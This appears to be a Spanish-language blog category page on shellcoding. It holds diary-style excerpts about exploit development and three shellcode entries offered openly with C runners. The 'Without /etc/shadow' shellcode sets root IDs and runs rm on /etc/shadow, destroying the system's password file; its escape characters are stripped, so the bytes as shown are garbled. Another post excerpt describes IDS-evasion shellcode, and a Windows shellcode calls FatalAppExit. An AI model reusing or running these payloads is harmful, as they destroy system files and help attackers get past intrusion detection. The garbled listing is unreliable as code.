Categoría: shellcoding

Domingo, 3 de Noviembre de 2019: Un problema a la vez

Querido Diario… Enrique me dejó en la frente a la puerta, y bajó a abrirme. Al abrir la puerta del coche sentí el frío de la noche y el aroma a jardín. Salí del coche, mientras Enrique acomodaba mi saco, me quede viendo hacía la fuente. El viento golpeaba el agua y me rociaba la […]

Miércoles, 5 de Septiembre de 2018: Lo lindo de lo simple

Querido Diario… Haya por los años del quién sabe cuando que no recuerdo, Microsoft, hizo una modificación interesante a la forma en que se venía llamado a los Exceptions Handlers; en Windows XP SP1. Los Exception Handlers son una cadena de «objetos» (en realidad no son objetos, pero llevo todo el día intentado recordar como […]

Lunes, 29 de Marzo de 2018: Entrenamiento 101

Querido Diario… Mientras Nemux volvía el martes al trabajo para iniciar el ataque, no debía de olvidarme de Lalo 2, quién debía de ser entrenado para que en caso de deceso, tuviésemos a alguien listo para seguir. Debido a que no tengo mucho que hacer, decidí hacerlo yo mismo. Pero primero que nada… tenía que […]

Domingo, 14 de Enero de 2018: #viejastodassoniguales

Querido diario… #viejastodassoniguales… hasta en las películas y series. Querido Diario… los scripts de Metasploit pattern_create.rb y pattern_offset.rb cambiaron su sintaxis en las últimas versiones; dale -h para que aprendas a usarlos; es lo mismo pero «más mejor».

Without /etc/shadow

char tlayula[] = «x31xc0» «xb0x46» «x31xdb» «x31xc9» «xcdx80» «x31xc0» «x50» «x68x2fx2fx72x6d» «x68x2fx62x69x6e» «x89xe3» «x50» «x68x61x64x6fx77» «x68x2fx2fx73x68» «x68x2fx65x74x63» «x89xe1» «x50» «x51» «x53» «x89xe1» «xb0x0b» «xcdx80»; main() { (*(void(*) ()) tlayula)(); } The life is cruel… and I’m worst B\

Linux/x86 IDS evasion shellcode

When I was young I learned from Sergio Alvarez (Shadow), maybe the most skilled shellcoder from Argentina, a lot of the most weird, strange and amazing shellcoding techniques. Shadow is simply awesome.. This is a PoC of shellcode I developed using his technique to self-modifying opcodes to a multipurpose, in this case is to avoid […]

Windows 32bit messagebox shellcode

char quesadilla_de_queso[] = «\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42» «\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03» «\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b» «\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e» «\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c» «\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74» «\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe» «\x49\x0b\x31\xc0\x51\x50\xff\xd7»; int main(int argc, char **argv){int (*f)();f = (int (*)())quesadilla_de_queso;(int)(*f)();}